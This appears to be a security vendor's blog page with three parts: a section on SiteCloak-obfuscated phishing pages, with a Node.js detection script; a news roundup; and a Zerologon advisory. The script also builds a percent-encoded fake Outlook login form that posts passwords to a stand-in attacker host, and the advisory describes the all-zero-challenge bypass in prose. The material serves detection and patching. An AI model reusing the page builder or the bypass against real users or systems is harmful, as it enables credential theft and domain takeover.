    The rendered page is fairly advanced in that it does not ask the user to enter their email address, as it is encoded in the URL. It also asks for the password twice before redirecting the user to a real outlook.com page. Not only does this error-check the password for the attackers, but it also leaves the user with no hint that they entered their password on a fake site.
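As an added example (not code from the original post), the following Node.js script shows what a scanner has to do to see through both techniques above: it peels the unescape() string layers statically and strips ZeroFont text before looking for a password form. The sample page, the attacker host login-verify.example, the nested-encoding loader and the small allowlist of legitimate sign-in hosts are constructed for this example; the variable name html_encoder_data is the one the text mentions.

```javascript
// Added example, not code from the original post: a static SiteCloak unwrapper.
// It peels the percent-encoded string layers that a document.write(unescape(...))
// loader hides a page behind, strips ZeroFont text, and reports whether the page
// the victim would actually see is a credential-harvesting form.

// The page as the victim sees it (constructed). ZeroFont spans split the brand
// keywords so a raw keyword match fails; the form posts to the attacker's host.
const RENDERED_PAGE = `<html><body>
<h1>Out<span style="font-size:0">h1dd3n</span>look</h1>
<p>Sign<span style="font-size: 0px;">zz</span> in to continue</p>
<form method="POST" action="https://login-verify.example/auth.php">
  <input type="hidden" name="email" value="victim@corp.example">
  <input type="password" name="pw">
  <input type="submit" value="Sign in">
</form>
</body></html>`;

// Encode every UTF-16 code unit as %XX (or %uXXXX) so no plaintext keyword
// survives in the served HTML; unescape() reverses it exactly.
function percentEncodeAll(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    out += c < 256 ? '%' + c.toString(16).toUpperCase().padStart(2, '0')
                   : '%u' + c.toString(16).toUpperCase().padStart(4, '0');
  }
  return out;
}

// The page the attacker serves: `layers` nested encodings plus a matching
// document.write(unescape(unescape(...))) loader (constructed, hypothetical).
function buildObfuscatedPage(rendered, layers) {
  let data = rendered;
  for (let i = 0; i < layers; i++) data = percentEncodeAll(data);
  const unwrap = 'unescape('.repeat(layers) + 'html_encoder_data' + ')'.repeat(layers);
  return '<html><body><script>var html_encoder_data="' + data + '";' +
         'document.write(' + unwrap + ');</script></body></html>';
}

const PCT_ESCAPE = /%(?:u[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2})/;
// A quoted run made only of the characters escape() leaves alone, plus % escapes.
const QUOTED_RUN = /(["'])([A-Za-z0-9@*_+\-.\/%]+)\1/g;

// The encoded payload at this layer: the whole text (an already peeled layer)
// or the first string literal that contains % escapes.
function findEncodedPayload(text) {
  if (/^[A-Za-z0-9@*_+\-.\/%]+$/.test(text) && PCT_ESCAPE.test(text)) return text;
  for (const m of text.matchAll(QUOTED_RUN)) {
    if (PCT_ESCAPE.test(m[2])) return m[2];
  }
  return null;
}

// Static approximation of document.write(): decode layer by layer until no
// encoded payload remains (a production scanner renders in a real browser).
function peelEncodedLayers(html, maxLayers = 10) {
  let rendered = html;
  let layers = 0;
  while (layers < maxLayers) {
    const payload = findEncodedPayload(rendered);
    if (payload === null) break;
    const decoded = unescape(payload);
    if (decoded === payload) break;
    rendered = decoded;
    layers += 1;
  }
  return { rendered, layers };
}

// Drop ZeroFont elements (font-size:0), then scripts and tags, leaving the
// text a user would read on screen.
const ZERO_FONT = /<(\w+)\b[^>]*style=["'][^"']*font-size\s*:\s*0(?:px|pt|em|%)?\s*(?:;[^"']*)?["'][^>]*>[\s\S]*?<\/\1\s*>/gi;
function visibleText(html) {
  return html.replace(ZERO_FONT, '')
    .replace(/<script\b[\s\S]*?<\/script\s*>/gi, '')
    .replace(/<[^>]+>/g, ' ')
    .replace(/\s+/g, ' ')
    .trim();
}

// Hosts a Microsoft sign-in form may legitimately post to (assumption for this
// example; a production allowlist is larger).
const LEGITIMATE_LOGIN_HOSTS = new Set(['login.microsoftonline.com', 'login.live.com']);

function assessPage(html) {
  const { rendered, layers } = peelEncodedLayers(html);
  const hasPasswordInput = /<input\b[^>]*type=["']?password/i.test(rendered);
  const action = /<form\b[^>]*action=["']([^"']+)["']/i.exec(rendered);
  let formHost = null;
  if (action) {
    try { formHost = new URL(action[1]).hostname; } catch (e) { formHost = null; }
  }
  const visible = visibleText(rendered);
  const brandLure = /\b(outlook|office ?365|microsoft|sign in)\b/i.test(visible);
  const suspicious = hasPasswordInput && brandLure && formHost !== null &&
                     !LEGITIMATE_LOGIN_HOSTS.has(formHost);
  return { layers, hasPasswordInput, formHost, visible, brandLure, suspicious };
}

console.log(assessPage(buildObfuscatedPage(RENDERED_PAGE, 2)));
```

A keyword or tag match on the served HTML finds no password field at all, because every byte of the page is percent-encoded; assessPage() reports two peeled layers, a password input that posts to login-verify.example, and visible “Outlook” and “Sign in” text once the ZeroFont spans are removed, which together are the indicators a URL scanner needs to classify the page.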

How SonicWall Can Help

SonicWall Cloud App Security can identify SiteCloak-obfuscated websites, because the web-rendering and scanning engines utilize the same indicators of attack discovered by the email-rendering and scanning filters. With CAS Protection enabled, the attacks are prevented from ever reaching your inbox, making email more secure and reliable.

To learn more about SonicWall Cloud App Security, click here.

Cybersecurity News & Trends – 09-18-20

Between legislation to protect government IoT devices, developments in the TikTok saga and Supreme Court arguments, what’s happening at the federal level this week could have far-reaching implications for cybersecurity.


SonicWall in the News

Politics in the Technology World Order — Verdict Magazine
SonicWall President and CEO Bill Conner weighs in on the future of the U.S. data privacy landscape.

Perimeter 81 Looks To Take Firewall Appliances Out — Security Boulevard
SonicWall, an investor in Perimeter 81’s recent funding round, has partnered with the firm on its firewall-as-a-service software.

Sectigo to Be Acquired by GI Partners — Sectigo Press Release
In a comment about the acquisition, SonicWall President, CEO and Sectigo Board Chairman Bill Conner said, “The future is bright for Sectigo as the company builds on its impressive position as a digital identity and web security solutions leader.”


Industry News

This security awareness training email is actually a phishing scam — Bleeping Computer
A creative phishing campaign spoofs a well-known security company in an email pretending to be a reminder to complete security awareness training.

Oracle-TikTok Deal to Undergo U.S. Security Review — The Wall Street Journal
The Treasury Department said it would review an agreement for Oracle and others to revamp TikTok’s U.S. operations, with the aim of avoiding a ban of the popular video-sharing app.

House approves bill to secure internet-connected federal devices against cyber threats — The Hill
The Internet of Things (IoT) Cybersecurity Improvement Act, passed unanimously by the House, would require all internet-connected devices purchased by the federal government to comply with minimum security recommendations.

Hackers are getting more hands-on with their attacks. That’s not a good sign — ZDNet
Both nation-state-backed hackers and cybercriminals are trying to take advantage of the rise in remote working — and getting more sophisticated in their approach.

LockBit ransomware launches data leak site to double-extort victims — Bleeping Computer
The LockBit ransomware gang has launched a new data leak site to be used as part of their double extortion strategy to scare victims into paying a ransom.

Zerologon attack lets hackers take over enterprise networks — ZDNet
If you’re managing enterprise Windows servers, don’t skip on the August 2020 Patch.

Security researchers slam Voatz brief to the Supreme Court on anti-hacking law — Cyberscoop
The Supreme Court is about to take up a case with major implications for computer research — and a group of high-profile cybersecurity specialists doesn’t want mobile voting firm Voatz to have the last word.

Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods — The Register
Over the past 12 months, the Australian Cyber Security Centre has observed real-world impacts of ransomware incidents, which have typically originated from a user executing a file received as part of a spearphishing campaign.

Russian Intelligence Hackers Are Back, Microsoft Warns, Aiming at Officials of Both Parties — The New York Times
China is also growing more adept at targeting campaign workers, with Beijing mostly aiming at Biden campaign officials.

Iran Says US Vote Hack Allegation ‘Absurd’ — Security Week
Tehran on Friday hit back at allegations by Microsoft that Iran-based hackers had targeted the U.S. presidential campaigns.

Treasury Dept. sanctions Russian, Ukrainian individuals for election interference — The Hill
The Treasury Department has added four Russian and Ukrainian individuals to its specially designated nationals list, citing attempts by the individuals to interfere in U.S. elections.


In Case You Missed It

Windows Netlogon Elevation of Privilege Vulnerability CVE-2020-1472

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.
This vulnerability, also known as Zerologon, has a CVSS v3 base score of 10.0.

Netlogon Remote Protocol

The Netlogon Remote Protocol is used for secure communication between machines in a domain and domain controllers (DCs). The communication is secured with a shared session key computed by the client and the DC engaged in the secure channel. The session key is derived from a preconfigured shared secret known to both sides (the computer account’s password) together with the challenges they exchange when the channel is set up. The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) is a core authentication component of Active Directory that provides authentication for user and computer accounts.

Vulnerability (CVE-2020-1472)

The vulnerability arises from a flaw in the cryptographic implementation of the Netlogon protocol, specifically in its use of AES-CFB8 encryption. MS-NRPC uses an initialization vector (IV) of all zeros in AES-CFB8 mode when authenticating computer accounts, and the client controls the plaintext (its 8-byte challenge). With an all-zero IV and an all-zero challenge, the computed credential is all zeros for roughly 1 in 256 session keys, so an attacker who simply retries with zeros passes the authentication check after a few hundred attempts without knowing the account password. Because of this incorrect use of the mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain.

The successful exploitation of the vulnerability will allow an attacker to

  • Impersonate any computer on the network
  • Disable the signing and sealing that protect the Netlogon secure channel
  • Change the password associated with a computer’s Active Directory account

Affected products

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

Microsoft has patched this vulnerability (in the August 2020 security update) and urges customers to prioritize patching domain controllers, as they are the likely primary target. After the update, domain controllers log Event ID 5827 or 5828 in the System log when they deny a vulnerable Netlogon secure channel connection, and Event ID 5829 when they still allow one, which makes it straightforward to find unpatched or non-compliant clients.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15143: Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 1
  • IPS 15156: Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 2
  • IPS 15158: Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 3